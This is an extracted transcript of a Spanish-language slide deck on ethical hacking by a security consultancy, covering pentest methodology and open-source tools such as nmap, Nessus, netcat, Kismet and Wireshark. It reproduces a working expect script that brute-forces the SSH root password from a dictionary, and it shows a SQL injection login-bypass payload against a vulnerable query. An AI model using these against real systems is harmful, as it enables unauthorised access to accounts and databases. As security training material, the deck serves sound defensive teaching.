ethical hacking con software libre

Post on 08-Nov-2014

30 Views

Category:

Documents

1 Downloads

Preview:

Click to see full reader

TRANSCRIPT

www.Open-Sec.com

ETHICAL HACKING

Walter Cuestas, CEHGerente Generalwcuestas@open-sec.com

Carlos RenzoGerente de Proyectoscrenzo@open-sec.com

Mauricio UrizarConsultor Seniormurizar@open-sec.com

http://www.open-sec.com

www.Open-Sec.com

Por qué Open-Sec ?

Unico partner de Digium en Perú y Ecuador y uno de los 6 partners en Latino América.

Consultores expertos en Comunicaciones Unificadas. Consultores expertos en Soluciones de Telefonía VoIP.

Consultores expertos en seguridad VoIP. Open-Sec entrega 1 AÑO DE SOPORTE DIRECTO DE

DIGIUM.

Unica empresa en Perú que cuenta con consultores certificados como Certified Ethical Hacker por EC Council, la certificación de más prestigio a nivel internacional en ethical hacking.

Nuestros consultores saben como atacar y defender. En el 2007, Open-Sec realizó el 80% de los procesos de Ethical Hacking en

Perú.

Unica empresa peruana afiliada a ISECOM, orgaización líder en Seguridad de la Información y Seguridad Informática a nivel mundial.

Unica empresa en Perú que aplica la metodología OSSTMM (Open Source SecureTesting Methodology).

Los resultados de las evaluaciones que realizamos pueden ser validados ante ISECOM.

Pioneros en consultorías respecto a la NTP 17799

Las instalaciones más grandes en Perú se basan en SuSE Linux (Poder Judicial, BBVA).

Open-Sec entrega soporte a estas instalaciones mediante consultores expertos y certificados.

Miembros del proyecto OpenSUSE

www.Open-Sec.com

Quiénes somos ?

•Un Equipo de Consultores con experiencia en organizaciones corporativas, estatales y privadas en

∙ Ethical Hacking∙ Computación Forense∙ Aseguramiento∙ Voz sobre IP∙ Seguridad de la Información

www.Open-Sec.com

Principales Clientes de Open-Sec

Seguridad Informática Seguridad de la Información

Linux y Open Source

Estudio CaballeroBustamante

Qué dicen las estadísticas ?

Conocimientotécnicorequerido

Sofisticación de las herramientas de los atacantes

Manipulación dePaquetes / Spoofing

19901980

AdivinarPasswords

Programasautoreplicados

Password Cracking

Explotación devulnerabilidadesconocidas Deshabilitar

auditorías

Back Doors

Sweepers

Sniffers

Análisis “Ocultos”

Alto

Bajo 2000+

DDoS

Gusanos enInternet

O-day exploits

www.Open-Sec.com

Seguridad de la Información

www.Open-Sec.com

Seguridad es el No. 2.

Por qué está en el mundo de los negocios?

Es la seguridad SU negocio?

Sí no, qué esta protegiendo Ud.?

Puede contarlo ? Tiene un valor?

Por qué usan computadoras ?

Productividad, eficiencia, costos Riéndose con un amigo de las fotos corporativas que 

encontró en su red wireless

Admin borrando logs después de bajar películas toda la 

ncohe

Re­envia correos de su jefe a un reportero aún cuando ella no tiene derechos para 

ello

Vende lapiceros y toner por Internet, los 

“toma” del trabajo

Cambiando las fechas en los registros de 

impuestos antes de una audotoría

www.Open-Sec.com

Qué es seguridad ???

Proteger la información de un amplio espectro de amenazas, a efectos de asegurar la continuidad del negocio, minimizar los daños a la organización y maximizar el retorno de inversiones y las oportunidades del negocio.

Asegurar que los recursos del sistema de información (material informático o programas) de una organización sean utilizados de la manera que se decidió..

Seguridad de la Información

Seguridad Informática

www.Open-Sec.com

ExploitsDa

orígen a

Conducea

PuedeDañar

YCausar

un

Que generala aplicación de medidas de

Afectadirectamente

ActivoExposure

Agente de Amenaza

Amenaza

Vulnerabilidad

Protección

Debilidades que puedenproveer de accesono autorizado a

los recursos

Cualquier daño potencial a los sistemas de información

Probabilidad que un Agente de

Amenaza explote una vulnerabilidad

Riesgo

Actúa en las Amenazas

Actúa en las Amenazas

Instancia en que es

expuesto a perdidas debido al Agente de Amenaza

Amenazas, vulnerabilidades & riesgos

www.Open-Sec.com

Ethical Hacking ....

www.Open-Sec.com

“Hackeando” ?

www.open­sec.com

www.Open-Sec.com

Nuestros “hackers”...

www.Open-Sec.com

Los REALES...

www.Open-Sec.com

Ellos las prefieren GORDAS...?

www.Open-Sec.com

Wow! Tengo que aprender mucho!

www.Open-Sec.com

No tanto...Uds ya son “viejos”....

www.Open-Sec.com

Vulnerabilidades Frecuentes

Cliente

Remoto

0.Ausencia de SPPPG.1.Configuración no decuada de router.2.RAS no asegurado ni monitoreado.3.Fuga de información.4.Servicios innecesarios.5.Passwords débiles.6.Cuentas con demasiado privilegio.7.Servicios Internet mal configurados.8.Firewall mal configurado.9.Ausencia de parches o configuración default.10.Derechos excesivos sobre recursos.11.Excesivas relaciones de confianza.12.Servicios no autenticados/autorizados.13.Ausencia de IDPS(NIPDS,NNIPDS,HIDPS).

Router

Internet

RAS

Oficina

Remota

Firewall

Router

Interno

DMZIDPS

VLAN1

Red Interna

VLAN2

www.Open-Sec.com

Estudios y Certificaciones, se requieren ?

www.Open-Sec.com

EL HACKING 

ES UN ARTE LA EVALUACIÓN

 DESEGURIDAD

ES UNACIENCIA

www.Open-Sec.com

No se requiere tan poco como esto...

www.Open-Sec.com

Perotampocotantocomo esto....

www.Open-Sec.com

Se requiere una metodología...

Obtención de Información y Footprinting

Trofeo

Evidencia

Borrado de

Rastros

Escalamiento de PrivilegiosObtención

de

Acceso

Análisis

de

Vulnerabilidades

Scanning

y

Enumeración

Footprint

www.Open-Sec.com

Peromejoruna de VERDAD, ESTANDARIZADA,DOCUMENTADA,MANTENIDA,ACEPTADA, CERTIFICABLE

www.open­sec.com

www.Open-Sec.com

OSSTMM :Metodología

Cuantificable

www.Open-Sec.com

A qué ayuda OSSTMM ? A pasar del caos (desorden sin resultado positivo) y la frustración ...

www.Open-Sec.com

... a solamente esperar por los resultados...bueno, es un decir...

www.Open-Sec.com

Análisis de Vulnerabilidad versus Pruebas de Penetración

Herramientas automatizadas versus “Análisis a pulso”

www.Open-Sec.com

Ejemplo de Vulnerabilidad Confirmada

www.Open-Sec.com

Revisión de la Inteligencia Competitiva

Sólo un ejemplo de OSSTMM, entonces, ...

www.Open-Sec.com

Las Herramientas....

www.Open-Sec.com

HerramientaNro 1

www.Open-Sec.com

www.Open-Sec.com

www.Open-Sec.com

www.Open-Sec.com

www.Open-Sec.com

www.Open-Sec.com

Muchas veces tendrán que compilar...

www.Open-Sec.com

Casi siempre requerirán acceso tipo root...aunque algunas tienen su versión para MS Windows...nadie es perfecto :(

www.Open-Sec.com

   Herramienta Nro 2 : NMAP (Network MAPper)

www.Open-Sec.com

NMAP­FENMAP CLI

www.Open-Sec.com

nmap -P0 -v -oA archivo_log direccion_ipnmap -sR -A -P0 -v -oN archivo_log direccion_ip

Las más usadas :

www.insecure.org

www.Open-Sec.com

PASSIVE OS fingerprint scanning

Conexiones entrantes p0f

Conexiones salientesp0f -A -S -M-A SYN/ACK-S mostrar incluso firmas conocidas-M detectar NAT

192.165.38.73:20908 - OpenBSD 3.0-3.4 (up: 836 hrs) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN) 192.165.38.73:21154 - Linux 2.4/2.6 (NAT!) (up: 173 hrs) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN) 192.165.38.73:22003 - Windows XP Pro SP1, 2000 SP3 (NAT!) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)

>> Masquerade at 192.165.38.73: indicators at 69%.

www.Open-Sec.com

Herramienta Nro 3

Con la versión 3, ir a http://www.openvas.org/doku.php

www.nessus.org

www.Open-Sec.com

Instalación de Nessus :

• Servidor v3– Seleccionar “Nessus 3.0.6 for Linux”.– Registrarse para envió de código de activación– Descargar archivo según distribución linux

• Nessus-3.0.6-suse10.0.i586.rpm• Disponible para todos los sistemas Unix

– Instalar archivo descargado.

www.Open-Sec.com

Ejecución del cliente :

#nessus &

www.Open-Sec.com

NessConnect : El mejor cliente de Nessus...

www.Open-Sec.com

VulnerabilidadesaniveldeAplicaciones

www.Open-Sec.com

Herramienta Nro. 4 : wikto

http://www.sensepost.com/research/wikto/

www.Open-Sec.com

Varios en uno solo : Spider, Fingerprint, Wikto, Googler

www.Open-Sec.com

Herramienta Nro 5

NetCat

        /\_/\       / 0 0 \   ====v====       \  W  /       |     |     _       / ___ \    /      / /   \ \  |     (((­­­­­)))­'      /     (      ___      \__.=|___E             /

http://netcat.sourceforge.net/

www.Open-Sec.com

www.Open-Sec.com

www.Open-Sec.com

Herramientas Nro 6

Simples Scripts#!/usr/bin/expect -f## simple expect exploit to brute force root's password via ssh without# detection.. see CLABS200101 for info on this exploit.## this is beerware, just buy me a beer at defcon if you like this.# build your own dictionary, use at your own risk, no warranty, etc.## jose@crimelabs.net january, 2001#

set timeout 3set target [lindex $argv 0]set dictionary [lindex $argv 1]

if {[llength $argv] != 2} { puts stderr "Usage: $argv0 root@target dictionary\n" exit }

set tryPass [open $dictionary r]

foreach passwd [split [read $tryPass] "\n"] { spawn ssh $target expect ":" send "$passwd\n" expect "#" { puts "password is $passwd\n" ; exit } set id [exp_pid] exec kill -INT $id}#www.hack.co.za

www.Open-Sec.com

Herramienta Nro 7Wireless Hacking : Kismet

www.open­sec.com

www.Open-Sec.com

Herramienta Nro 8Secuestro de Sesiones y Más!

www.open­sec.com

www.Open-Sec.com

Herramienta Nro 9SQL Injection – La Moda

www.open­sec.com

' or 1=1­­

sql = "SELECT * FROM users WHERE username = '" + username + "' AND userpass = '" + password + "'"

SELECT * FROM users WHERE username = '' or 1=1--' AND userpass =''

www.Open-Sec.com

Herramienta Nro 10Apelando a la inocencia...

www.open­sec.com

www.Open-Sec.com

Hacking VoIP

Políticas y Procedimientos

Seguridad del Sistema Operativo

Seguridad Servicios Complementarios

(web, DHCP, bases de datos)

Seguridad de la Red (IO,TCP,UDP)

Seguridad Física

Buffer overflow, configuración débil,

DoS, gusanos

Fraude de llamadas, fuzzing,

INVITE/BYE/CANCEL floods, call hijacking,

call eavesdropping, modificación de llamadas

Passwords débiles en el correo

de voz, abuso de larga distancia

Servidor expuesto, DoS, Reboot

SYN flooding, ICMP unreacheable,

DDoS

SQL Injection, saturación de DHCP

Seguridad del protocol

VoIP y Aplicaciones

www.Open-Sec.com

Asterisk

Scanning

The 65527 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE

111/udp open|filtered rpcbind

631/udp open|filtered unknown

694/udp open|filtered unknown

2727/udp open|filtered unknown

4520/udp open|filtered unknown

4569/udp open|filtered unknown IAX

5060/udp open|filtered sip SIP

5353/udp open|filtered unknown

32768/udp open|filtered omad

www.Open-Sec.com

Herramienta 11 : Wireshark !!!

+ VoMIT + waveplayer

www.Open-Sec.com

Herramienta 12 : SiVuSRequest­Line: REGISTER sip:10.1.101.99 SIP/2.0

     Method: REGISTER

     Resent Packet: False

 Message Header

     Via: SIP/2.0/UDP 10.1.101.99:5060;

      branch=83c598e0­6fce­4414­afdd­11a8acd30527

     From: 4000 <sip:4000@10.1.101.99>;

      tag=83c5ac5c­6fce­4414­80ce­de7720487e25

      To: 4000 <sip:4000@10.1.101.99>

      Call­ID: 83c5baaa­6fce­4414­8ff6­f57c46985163

      CSeq: 1 REGISTER

      Max­Forwards: 70

      Contact: *

      Expires: 0

      Content­Length: 0

www.Open-Sec.comwww.open­sec.com

www.Open-Sec.com

www.Open-Sec.com

Sóloelcieloesellímite...

www.open­sec.com

www.Open-Sec.com

DEFCON

No hay victimas, SOLO VOLUNTARIOS

top related